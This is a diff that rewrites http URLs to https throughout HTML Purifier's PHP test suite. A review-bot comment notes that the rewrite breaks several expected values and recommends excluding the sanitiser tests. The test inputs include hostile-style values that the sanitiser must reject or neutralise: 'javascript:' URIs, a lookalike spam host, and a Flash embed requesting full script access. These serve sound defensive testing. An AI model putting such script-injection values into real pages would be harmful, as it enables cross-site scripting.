$this->assertDef('javascript:bad_stuff();', false);
$this->assertDef('ftp://www.example.com/');
$this->assertDef('news:rec.alt');
@@ -28,15 +28,15 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testIntegrationWithPercentEncoder()
{
$this->assertDef(
'http://www.example.com/%56%fc%GJ%5%FC',
'http://www.example.com/V%FC%25GJ%255%FC'
'https://www.example.com/%56%fc%GJ%5%FC',
'https://www.example.com/V%FC%25GJ%255%FC'
);
}
public function testPercentEncoding()
{
$this->assertDef(
'http:colon:mercenary',
'https:colon:mercenary',
'colon%3Amercenary'
);
}
@@ -44,23 +44,23 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testPercentEncodingPreserve()
{
$this->assertDef(
'http://www.example.com/abcABC123-_.!~*()\''
'https://www.example.com/abcABC123-_.!~*()\''
);
}
public function testEmbeds()
{
$this->def = new HTMLPurifier_AttrDef_URI(true);
$this->assertDef('http://sub.example.com/alas?foo=asd');
$this->assertDef('https://sub.example.com/alas?foo=asd');
$this->assertDef('mailto:foo@example.com', false);
}
public function testConfigMunge()
{
$this->config->set('URI.Munge', 'http://www.google.com/url?q=%s');
$this->config->set('URI.Munge', 'https://www.google.com/url?q=%s');
$this->assertDef(
'http://www.example.com/',
'http://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'
'https://www.example.com/',
'https://www.google.com/url?q=http%3A%2F%2Fwww.example.com%2F'
);
$this->assertDef('index.html');
$this->assertDef('javascript:foobar();', false);
@@ -68,17 +68,17 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testDefaultSchemeRemovedInBlank()
{
$this->assertDef('http:', '');
$this->assertDef('https:', '');
}
public function testDefaultSchemeRemovedInRelativeURI()
{
$this->assertDef('http:/foo/bar', '/foo/bar');
$this->assertDef('https:/foo/bar', '/foo/bar');
}
public function testDefaultSchemeNotRemovedInAbsoluteURI()
{
$this->assertDef('http://example.com/foo/bar');
$this->assertDef('https://example.com/foo/bar');
}
public function testDefaultSchemeNull()
@@ -106,7 +106,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testURIDefinitionValidation()
{
$parser = new HTMLPurifier_URIParser();
$uri = $parser->parse('http://example.com');
$uri = $parser->parse('https://example.com');
$this->config->set('URI.DefinitionID', 'HTMLPurifier_AttrDef_URITest->testURIDefinitionValidation');
generate_mock_once('HTMLPurifier_URIDefinition');
@@ -132,7 +132,7 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
HTMLPurifier_DefinitionCacheFactory::instance($factory_mock);
$factory_mock->returns('create', $cache_mock);
$this->assertDef('http://example.com');
$this->assertDef('https://example.com');
HTMLPurifier_DefinitionCacheFactory::instance($old);
}
@@ -155,10 +155,10 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
$this->config->set('URI.HostPolicy', 'DenyAll');
$this->config->set('URI.HostWhitelist', array(null, 'google.com'));
$this->assertDef('http://example.com/fo/google.com', false);
$this->assertDef('https://example.com/fo/google.com', false);
$this->assertDef('server.txt');
$this->assertDef('ftp://www.google.com/?t=a');
$this->assertDef('http://google.com.tricky.spamsite.net', false);
$this->assertDef('https://google.com.tricky.spamsite.net', false);
}
*/
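Review bot: In testConfigMunge the input was rewritten to `https://www.example.com/`, but the expected munged value still ends in `q=http%3A%2F%2Fwww.example.com%2F` because the search-and-replace did not match the percent-encoded scheme. The expectation would need to be `'https://www.google.com/url?q=https%3A%2F%2Fwww.example.com%2F'`, or the fixture should be left as it was. The default-scheme cases look affected too (`'https:'` to `''`, `'https:/foo'` to `'/foo'`, `'https:colon:mercenary'`, and the testDefaultSchemeRemoved* methods): they expect the scheme to be stripped, which presumably only happens when it equals the configured URI.DefaultScheme, and nothing in these hunks sets that to https. These strings are inputs to a URI sanitiser's test suite rather than live links, so I would exclude this file from the http-to-https rewrite to keep the suite covering what it was written to cover. The last hunk sits inside a block comment that opens outside the hunk.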


@@ -97,7 +97,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness
$this->context->register('CurrentToken', $current_token);
// 0
$current_token = new HTMLPurifier_Token_Start('a', array('href' => 'http://example.com'), 32);
$current_token = new HTMLPurifier_Token_Start('a', array('href' => 'https://example.com'), 32);
$this->language->returns('formatMessage', 'Token message',
array('message-data-token', array('CurrentToken' => $current_token)));
$this->collector->send(E_NOTICE, 'message-data-token');
@@ -116,7 +116,7 @@ class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness
$result = array(
0 => array(32, E_NOTICE, 'Token message', array()),
1 => array(32, E_NOTICE, '$CurrentAttr.Name => $CurrentAttr.Value', array()),
2 => array(32, E_NOTICE, 'href => http://example.com', array())
2 => array(32, E_NOTICE, 'href => https://example.com', array())
);
$this->assertIdentical($this->collector->getRaw(), $result);


@@ -253,7 +253,7 @@ text-align:center
public function test_cleanCSS_caseSensitive()
{
$this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"http://foo/BAR\")\n}");
$this->assertCleanCSS("a .foo #ID div.cl#foo {\nbackground:url(\"https://foo/BAR\")\n}");
}
public function test_extractStyleBlocks_backtracking()


@@ -15,7 +15,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult( // need support for label for later
'
<form action="http://somesite.com/prog/adduser" method="post">
<form action="https://somesite.com/prog/adduser" method="post">
<p>
<label>First name: </label>
<input type="text" id="firstname" /><br />
@@ -35,7 +35,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/component-select" method="post">
<form action="https://somesite.com/prog/component-select" method="post">
<p>
<select multiple="multiple" size="4" name="component-select">
<option selected="selected" value="Component_1_a">Component_1</option>
@@ -56,7 +56,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/someprog" method="post">
<form action="https://somesite.com/prog/someprog" method="post">
<p>
<select name="ComOS">
<option selected="selected" label="none" value="none">None</option>
@@ -83,7 +83,7 @@ class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness
{
$this->config->set('HTML.Doctype', 'HTML 4.01 Strict');
$this->assertResult('
<form action="http://somesite.com/prog/text-read" method="post">
<form action="https://somesite.com/prog/text-read" method="post">
<p>
<textarea name="thetext" rows="20" cols="80">
First line of initial text.


@@ -13,15 +13,15 @@ class HTMLPurifier_HTMLModule_NofollowTest extends HTMLPurifier_HTMLModuleHarnes
public function testNofollow()
{
$this->assertResult(
'<a href="http://google.com">x</a><a href="http://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>',
'<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
'<a href="https://google.com">x</a><a href="https://google.com" rel="blah">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>',
'<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
);
}
public function testNofollowDupe()
{
$this->assertResult(
'<a href="http://google.com" rel="nofollow">x</a><a href="http://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
'<a href="https://google.com" rel="nofollow">x</a><a href="https://google.com" rel="blah nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>'
);
}


@@ -25,12 +25,12 @@ class HTMLPurifier_HTMLModule_ObjectTest extends HTMLPurifier_HTMLModuleHarness
public function testStandardUseCase()
{
$this->assertResult(
'<object type="video/x-ms-wmv" data="http://domain.com/video.wmv" width="320" height="256">
<param name="src" value="http://domain.com/video.wmv" />
'<object type="video/x-ms-wmv" data="https://domain.com/video.wmv" width="320" height="256">
<param name="src" value="https://domain.com/video.wmv" />
<param name="autostart" value="false" />
<param name="controller" value="true" />
<param name="pluginurl" value="http://www.microsoft.com/Windows/MediaPlayer/" />
<a href="http://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a>
<param name="pluginurl" value="https://www.microsoft.com/Windows/MediaPlayer/" />
<a href="https://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a>
</object>'
);
}


@@ -13,31 +13,31 @@ class HTMLPurifier_HTMLModule_SafeEmbedTest extends HTMLPurifier_HTMLModuleHarne
public function testMinimal()
{
$this->assertResult(
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" />',
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />'
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" />',
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />'
);
}
public function testYouTube()
{
$this->assertResult(
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>',
'<embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />'
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>',
'<embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />'
);
}
public function testMalicious()
{
$this->assertResult(
'<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />',
'<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />'
'<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />',
'<embed src="https://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />'
);
}
public function testFull()
{
$this->assertResult(
'<b><embed src="http://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>'
'<b><embed src="https://www.youtube.com/v/RVtEQxH7PWA&amp;hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>'
);
}
